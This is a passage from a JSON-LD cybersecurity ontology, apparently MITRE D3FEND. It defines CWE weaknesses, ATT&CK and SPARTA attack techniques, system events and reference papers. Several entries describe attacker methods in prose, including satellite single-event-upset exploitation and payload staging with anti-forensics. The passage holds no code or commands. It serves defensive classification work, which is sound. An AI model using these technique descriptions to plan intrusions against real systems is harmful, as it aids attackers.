        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:CWE-784",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-784",
      "d3f:definition": "The product uses a protection mechanism that relies on the existence or values of a cookie, but it does not properly ensure that the cookie is valid for the associated user.",
      "rdfs:label": "Reliance on Cookies without Validation and Integrity Checking in a Security Decision",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-565"
        },
        {
          "@id": "d3f:CWE-807"
        }
      ]
    },
    {
      "@id": "d3f:CWE-834",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-834",
      "d3f:definition": "The product performs an iteration or loop without sufficiently limiting the number of times that the loop is executed.",
      "rdfs:label": "Excessive Iteration",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:T1027.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.003",
      "d3f:definition": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.",
      "rdfs:label": "Steganography",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:EXF-0002",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0002",
      "d3f:definition": "Information is extracted not by reading files or decrypting frames but by observing physical or protocol byproducts of computation, power draw, electromagnetic emissions, timing, thermal signatures, or traffic patterns. Repeated measurements create distinctive fingerprints correlated with internal states (key use, table loads, parser branches, buffer occupancy). Matching those fingerprints to models or templates yields sensitive facts without direct access to the protected data. In space systems, vantage points span proximity assets (for EM/thermal), ground testing and ATLO (for direct probing), compromised on-board modules that can sample rails or sensors, and remote observation of link-layer timing behaviors.",
      "rdfs:label": "Side-Channel Exfiltration - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0002/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Side-Channel Exfiltration"
    },
    {
      "@id": "d3f:OperatingSystemConfigurationModificationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event that alters persistent operating-system configuration resources such as kernel options, registry keys, service definitions, or security policies; affecting system startup, hardware interfaces, or global security enforcement.",
      "rdfs:label": "Operating System Configuration Modification Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationModificationEvent"
        },
        {
          "@id": "_:N8b4f1e5fc35f46ccbea3618d60a8d157"
        }
      ]
    },
    {
      "@id": "_:N8b4f1e5fc35f46ccbea3618d60a8d157",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfiguration"
      }
    },
    {
      "@id": "d3f:OperatingSystemProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An operating system process, or system process, is a process running to perform operating system functions.",
      "rdfs:label": "Operating System Process",
      "rdfs:seeAlso": {
        "@id": "http://people.scs.carleton.ca/~maheshwa/courses/300/l4/node7.html"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Process"
      },
      "skos:altLabel": "System Process"
    },
    {
      "@id": "d3f:T1577",
      "@type": "owl:Class",
      "d3f:attack-id": "T1577",
      "d3f:definition": "Adversaries may modify applications installed on a device to establish persistent access to a victim. These malicious modifications can be used to make legitimate applications carry out adversary tasks when these applications are in use.",
      "rdfs:label": "Compromise Application Executable - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePersistenceTechnique"
      },
      "skos:prefLabel": "Compromise Application Executable"
    },
    {
      "@id": "d3f:M1052",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:SystemCallFiltering"
      },
      "rdfs:label": "User Account Control"
    },
    {
      "@id": "d3f:may-be-isolated-by",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may be isolated by",
      "owl:inverseOf": {
        "@id": "d3f:may-isolate"
      },
      "rdfs:label": "may-be-isolated-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:attack-may-be-countered-by"
      }
    },
    {
      "@id": "d3f:EX-0007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0007",
      "d3f:definition": "The attacker induces or opportunistically exploits a single-event upset (SEU), a transient bit flip or latch disturbance in logic or memory, so that software executes in a state advantageous to the attack. SEUs arise when charge is deposited at sensitive nodes by energetic particles or intense electromagnetic stimuli. An actor may time operations to coincide with natural radiation peaks or use artificial means from close range. Outcomes include corrupted stacks or tables, altered branch conditions, flipped configuration bits in FPGAs or controllers, and transient faults that push autonomy/FDIR into recovery modes with broader command acceptance. SEU exploitation is probabilistic; the technique couples repeated stimulation with careful observation of mode transitions, watchdogs, and error counters to land the system in a desired but nominal-looking state from which other actions can proceed.",
      "d3f:may-corrupt": [
        {
          "@id": "d3f:CacheMemory"
        },
        {
          "@id": "d3f:FlashMemory"
        },
        {
          "@id": "d3f:MemoryExtent"
        },
        {
          "@id": "d3f:ProcessorRegister"
        }
      ],
      "rdfs:label": "Trigger Single Event Upset - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0007/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAExecutionTechnique"
        },
        {
          "@id": "_:N45421b4312ec4d1b8c6744eafda6670d"
        },
        {
          "@id": "_:N39996caf6c2e489f8086442ec8df6037"
        },
        {
          "@id": "_:Ncd68ab630fac47f1a2853e8311d88649"
        },
        {
          "@id": "_:N38a25a1c21f04998951b7be26a45f256"
        }
      ],
      "skos:prefLabel": "Trigger Single Event Upset"
    },
    {
      "@id": "_:N45421b4312ec4d1b8c6744eafda6670d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-corrupt"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CacheMemory"
      }
    },
    {
      "@id": "_:N39996caf6c2e489f8086442ec8df6037",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-corrupt"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FlashMemory"
      }
    },
    {
      "@id": "_:Ncd68ab630fac47f1a2853e8311d88649",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-corrupt"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryExtent"
      }
    },
    {
      "@id": "_:N38a25a1c21f04998951b7be26a45f256",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-corrupt"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessorRegister"
      }
    },
    {
      "@id": "d3f:CWE-15",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-15",
      "d3f:definition": "One or more system settings or configuration elements can be externally controlled by a user.",
      "rdfs:label": "External Control of System or Configuration Setting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-610"
        },
        {
          "@id": "d3f:CWE-642"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1041",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1041",
      "d3f:definition": "The product has multiple functions, methods, procedures, macros, etc. that contain the same code.",
      "rdfs:label": "Use of Redundant Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:ATLASDiscoveryTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0008"
      },
      "rdfs:label": "Discovery Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N077225b005d74caaa50fb82d18fbbf69"
        }
      ],
      "skos:prefLabel": "Discovery Technique"
    },
    {
      "@id": "_:N077225b005d74caaa50fb82d18fbbf69",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0008"
      }
    },
    {
      "@id": "d3f:CCI-000071_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization monitors for unauthorized remote connections to the information system on an organization-defined frequency.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-19T00:00:00"
      },
      "rdfs:label": "CCI-000071"
    },
    {
      "@id": "d3f:T1021.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1021.001",
      "d3f:creates": {
        "@id": "d3f:RDPSession"
      },
      "d3f:definition": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.",
      "d3f:produces": {
        "@id": "d3f:AdministrativeNetworkTraffic"
      },
      "rdfs:label": "Remote Desktop Protocol",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1021"
        },
        {
          "@id": "_:Na9aca3eec59d46d3b18121c21da1e3b2"
        },
        {
          "@id": "_:N8bd85000967347c9926c7a4f8aa51fee"
        }
      ]
    },
    {
      "@id": "_:Na9aca3eec59d46d3b18121c21da1e3b2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RDPSession"
      }
    },
    {
      "@id": "_:N8bd85000967347c9926c7a4f8aa51fee",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "d3f:EpistemicLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-EL",
      "d3f:definition": "Epistemic logic addresses modalities of knowledge; i.e., the certainty of sentences.",
      "d3f:kb-article": "## References\n1. Epistemic logic. (2023, June 4). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Modal_logic#Epistemic_logic)",
      "d3f:synonym": "Epistemic Modal Logic",
      "rdfs:label": "Epistemic Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:ModalLogic"
      }
    },
    {
      "@id": "d3f:CWE-287",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-287",
      "d3f:definition": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.",
      "d3f:synonym": [
        "AuthC",
        "AuthN",
        "authentification"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:AuthenticationFunction"
      },
      "rdfs:label": "Improper Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-284"
        },
        {
          "@id": "_:Ne09da4cbe2eb43118300538c74a5cdd8"
        }
      ]
    },
    {
      "@id": "_:Ne09da4cbe2eb43118300538c74a5cdd8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationFunction"
      }
    },
    {
      "@id": "d3f:T1564.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.004",
      "d3f:definition": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)",
      "d3f:modifies": {
        "@id": "d3f:FileSystemMetadata"
      },
      "rdfs:label": "NTFS File Attributes",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:N8dc19243d0b34506a893b548e822eb5c"
        }
      ]
    },
    {
      "@id": "_:N8dc19243d0b34506a893b548e822eb5c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "d3f:WindowsRegistryKeyUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an existing registry key is updated or reconfigured, reflecting changes to its metadata or properties.",
      "rdfs:label": "Windows Registry Key Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryKeyEvent"
        },
        {
          "@id": "_:Nee059f993c83476faa449e14499db88c"
        }
      ]
    },
    {
      "@id": "_:Nee059f993c83476faa449e14499db88c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKeyCreationEvent"
      }
    },
    {
      "@id": "d3f:TimeSeriesAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-TSA",
      "d3f:definition": "Time series analysis comprises methods for analyzing time series data in order to extract meaningful statistics and other characteristics of the data.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Time series. [Link](https://en.wikipedia.org/wiki/Time_series)",
      "rdfs:label": "Time Series Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:StatisticalMethod"
      }
    },
    {
      "@id": "d3f:Dependency",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A dependency is the relationship of relying on or being controlled by someone or something else.  This class reifies dependencies that correspond to the object property depends-on.",
      "d3f:dependent": {
        "@id": "d3f:D3FENDCore"
      },
      "d3f:provider": {
        "@id": "d3f:D3FENDCore"
      },
      "rdfs:label": "Dependency",
      "rdfs:seeAlso": [
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/14024833-n"
        },
        {
          "@id": "https://www.cisa.gov/what-are-dependencies"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N4527e8acfe3c4bbab90df9ce2f61fa2c"
        },
        {
          "@id": "_:Nf1780192d3294a06bf11f4481cfadf39"
        }
      ]
    },
    {
      "@id": "_:N4527e8acfe3c4bbab90df9ce2f61fa2c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:dependent"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "_:Nf1780192d3294a06bf11f4481cfadf39",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:provider"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:CWE-459",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-459",
      "d3f:definition": "The product does not properly \"clean up\" and remove temporary or supporting resources after they have been used.",
      "d3f:synonym": "Insufficient Cleanup",
      "rdfs:label": "Incomplete Cleanup",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-404"
      }
    },
    {
      "@id": "d3f:T1596.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1596.001",
      "d3f:definition": "Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.",
      "rdfs:label": "DNS/Passive DNS",
      "rdfs:subClassOf": {
        "@id": "d3f:T1596"
      }
    },
    {
      "@id": "d3f:EventLogArchiveEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the archiving of event log data, typically to preserve historical records in a compressed or secure format.",
      "rdfs:label": "Event Log Archive Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EventLogEvent"
      }
    },
    {
      "@id": "d3f:RD-0004.02",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0004.02",
      "d3f:definition": "Having chosen a path, adversaries pre-position the specific packages and procedures they intend to use: binary exploits, malicious tables and ephemerides, patch images, modem profiles, and operator macros that chain actions. On compromised or leased infrastructure, they stage these items where execution will be fastest, provider portals, scheduler queues, ground station file drops, or automation repos, with triggers tied to pass start, beacon acquisition, or operator shift changes. Artifacts are formatted to mission protocols (framing, CRC/MAC, timetags), chunked to meet rate/size constraints, and signed or wrapped to evade superficial checks. Anti-forensics (timestamp tampering, log suppression, ephemeral storage) reduce audit visibility, while fallback payloads are kept for alternate modes (safe-mode dictionaries, recovery consoles).",
      "rdfs:label": "Upload Exploit/Payload - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0004/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0004"
      },
      "skos:prefLabel": "Upload Exploit/Payload"
    },
    {
      "@id": "d3f:CWE-1320",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1320",
      "d3f:definition": "Untrusted agents can disable alerts about signal conditions exceeding limits or the response mechanism that handles such alerts.",
      "rdfs:label": "Improper Protection for Outbound Error Messages and Alert Signals",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:T1044",
      "@type": "owl:Class",
      "d3f:attack-id": "T1044",
      "d3f:definition": "Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1574.010",
      "rdfs:label": "File System Permissions Weakness",
      "rdfs:seeAlso": {
        "@id": "d3f:T1574.010"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-109",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-109",
      "d3f:definition": "Automatic filtering via a Struts bean has been turned off, which disables the Struts Validator and custom validation logic. This exposes the application to other weaknesses related to insufficient input validation.",
      "rdfs:label": "Struts: Validator Turned Off",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1173"
      }
    },
    {
      "@id": "d3f:CWE-589",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-589",
      "d3f:definition": "The product uses an API function that does not exist on all versions of the target platform. This could cause portability problems or inconsistencies that allow denial of service or other consequences.",
      "rdfs:label": "Call to Non-ubiquitous API",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-474"
      }
    },
    {
      "@id": "d3f:Isolate",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DefensiveTactic"
      ],
      "d3f:definition": "The isolate tactic creates logical or physical barriers in a system which reduces opportunities for adversaries to create further accesses.",
      "d3f:display-order": 2,
      "d3f:display-priority": 0,
      "rdfs:label": "Isolate",
      "rdfs:subClassOf": {
        "@id": "d3f:DefensiveTactic"
      }
    },
    {
      "@id": "d3f:CWE-912",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-912",
      "d3f:definition": "The product contains functionality that is not documented, not part of the specification, and not accessible through an interface or command sequence that is obvious to the product's users or administrators.",
      "rdfs:label": "Hidden Functionality",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-684"
      }
    },
    {
      "@id": "d3f:Reference-DiagnosisOfFaultsInducedByRadiationAndCircuitLevelDesignMitigationTechniques",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.mdpi.com/2079-9292/10/17/2144"
      },
      "d3f:kb-abstract": "In this paper, we discuss the diagnosis of particle-induced failures in harsh environments such as space and high-energy physics. To address these effects, simulation-before-test and simulation-after-test can be the key points in choosing which radiation hardening by design (RHBD) techniques can be implemented to mitigate or prevent failures. Despite the fact that total ionising dose (TID) has slow but destructive effects overtime on silicon devices, single-event effect (SEE) impulsively disrupts the typical operation of a circuit with temporary or permanent effects. The recently released SpaceFibre protocol drives the current requirements for space applications, and the future upgrade of the LHC experiment scheduled by CERN will require a redesign of the electronic front-end to sustain a radiation level up to the 1 Grad TID level. The effects that these two environments have on two different architectures for high-radiation and high-frequency data transmission are reported, and the efficiency of the mitigation techniques implemented, based on simulations and measurement tests, in the commercial 65 nm technology, are exploited.",
      "d3f:kb-author": "Danilo Monda, Gabriele Ciarpi, Sergio Saponara",
      "d3f:kb-reference-of": {
        "@id": "d3f:RadiationHardening"
      },
      "d3f:kb-reference-title": "Diagnosis of Faults Induced by Radiation and Circuit-Level Design Mitigation Techniques: Experience from VCO and High-Speed Driver CMOS ICs Case Studies",
      "rdfs:label": "Reference - Diagnosis of Faults Induced by Radiation and Circuit-Level Design Mitigation Techniques: Experience from VCO and High-Speed Driver CMOS ICs Case Studies"
    },
    {
      "@id": "d3f:T1546.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.005",
      "d3f:definition": "Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.",
      "d3f:executes": {
        "@id": "d3f:ShellCommand"
      },
      "d3f:may-create": {
        "@id": "d3f:ExecutableScript"
      },
      "d3f:may-modify": {
        "@id": "d3f:ExecutableScript"
      },
      "d3f:modifies": {
        "@id": "d3f:EventLog"
      },
      "rdfs:label": "Trap",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N31e97004caf546a1a2a8ddd58ea15a4f"
        },
        {
          "@id": "_:N4f28f89f43ac494c91a7f4e56d903543"
        },
        {
          "@id": "_:Na67e9225be574067a180ba6ce03cdc55"
        },
        {
          "@id": "_:N71f79a2334464afea4fff3d763662bc7"
        }
      ]
    },
    {
      "@id": "_:N31e97004caf546a1a2a8ddd58ea15a4f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ShellCommand"
      }
    },
    {
      "@id": "_:N4f28f89f43ac494c91a7f4e56d903543",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "_:Na67e9225be574067a180ba6ce03cdc55",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "_:N71f79a2334464afea4fff3d763662bc7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "d3f:SoundexMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SM",
      "d3f:definition": "Soundex is a phonetic algorithm for indexing names by sound, as pronounced in English.",
      "d3f:kb-article": "## How it works\nThe goal is for homophones to be encoded to the same representation so that they can be matched despite minor differences in spelling. The algorithm mainly encodes consonants; a vowel will not be encoded unless it is the first letter. Soundex is the most widely known of all phonetic algorithms (in part because it is a standard feature of popular database software. Improvements to Soundex are the basis for many modern phonetic algorithms.\n\n## References\n1. Soundex. (2023, April 19). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Soundex)",
      "rdfs:label": "Soundex Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:PartialMatching"
      }
    },
    {
      "@id": "d3f:T1631",
      "@type": "owl:Class",
      "d3f:attack-id": "T1631",
      "d3f:definition": "Adversaries may inject code into processes in order to evade process-based defenses or even elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.",
      "rdfs:label": "Process Injection - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePrivilegeEscalationTechnique"
        }
      ],
      "skos:prefLabel": "Process Injection"
    },
    {
      "@id": "d3f:SSHSession",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Secure Shell Protocol (SSH) session is a session over a secure channel established using SSH to connect a client to a server and establish the remote session.",
      "rdfs:label": "SSH Session",
      "rdfs:seeAlso": {
        "@id": "dbr:Secure_Shell_Protocol"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RemoteSession"
      }
    },
    {
      "@id": "d3f:CWE-299",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-299",
      "d3f:definition": "The product does not check or incorrectly checks the revocation status of a certificate, which may cause it to use a certificate that has been compromised.",
      "rdfs:label": "Improper Check for Certificate Revocation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-295"
        },
        {
          "@id": "d3f:CWE-404"
        }
      ]
    },
    {
      "@id": "d3f:Reference-File-modifyingMalwareDetection_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180121650A1/en?oq=US-2018121650-A1"
      },
      "d3f:kb-abstract": "A security agent implemented on a computing device is described herein. The security agent is configured to detect file-modifying malware by detecting that a process is traversing a directory of the memory of the computing device and detecting that the process is accessing files in the memory according to specified file access patterns. The security agent can also be configured to correlate actions of multiple processes that correspond to a specified file access pattern and detect that one or more of the multiple processes are malware by correlating their behavior.",
      "d3f:kb-author": "Daniel W. Brown",
      "d3f:kb-mitre-analysis": "This patent describes a technique for detecting file modifying malware such as wipers and ransomware that overwrite portions of files and encrypt portions of a computer's memory, respectively. Processes that are traversing a directory are identified along with file access patterns. Processes executing on a computing device that are traversing a directory include:\n\n* changing a directory of a process (e.g., iteratively, systematically, repeatedly)\n* detecting that a process is conducting an \"open directory\" operation repeatedly\n* the same process traversing through a directory and recording the locations of data files encountered in each sub - directory\n\nIn addition to identifying processes traversing a directory, particular file access patterns are also detected that may be indicative of malicious behavior including:\n* multiple file types being accessed\n* accessing a large number of files\n* files located in multiple locations in the directory being accessed\n\nIf a process is conducting a traversal of the directory and accessing files according to a defined access pattern associated with malicious behavior, a preventative action is performed.",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileAccessPatternAnalysis"
      },
      "d3f:kb-reference-title": "File-modifying malware detection",
      "rdfs:label": "Reference - File-modifying malware detection - Crowdstrike Inc"
    },
    {
      "@id": "d3f:T1553.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1553.002",
      "d3f:definition": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.",
      "d3f:enables": {
        "@id": "d3f:TA0005"
      },
      "rdfs:label": "Code Signing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1553"
        },
        {
          "@id": "_:Nd6fd159474214baa9946959ce1bc1fe9"
        }
      ]
    },
    {
      "@id": "_:Nd6fd159474214baa9946959ce1bc1fe9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0005"
      }
    },
    {
      "@id": "d3f:CWE-195",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-195",
      "d3f:definition": "The product uses a signed primitive and performs a cast to an unsigned primitive, which can produce an unexpected value if the value of the signed primitive can not be represented using an unsigned primitive.",
      "rdfs:label": "Signed to Unsigned Conversion Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-681"
      }
    },
    {
      "@id": "d3f:LocalAreaNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Intranet local area network (LAN) traffic is network traffic that does not cross a given network's boundaries; where that network is defined as a LAN.",
      "rdfs:label": "Local Area Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Intranet"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IntranetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:UserAccountMFADisableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where multi-factor authentication (MFA) is disabled for a user account.",
      "rdfs:label": "User Account MFA Disable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:Nf1050bf5cec241be9168c6bb5f15197f"
        }
      ]
    },
    {
      "@id": "_:Nf1050bf5cec241be9168c6bb5f15197f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountMFAEnableEvent"
      }
    },
    {
      "@id": "d3f:Model-freeReinforcementLearning",
      "@type": [
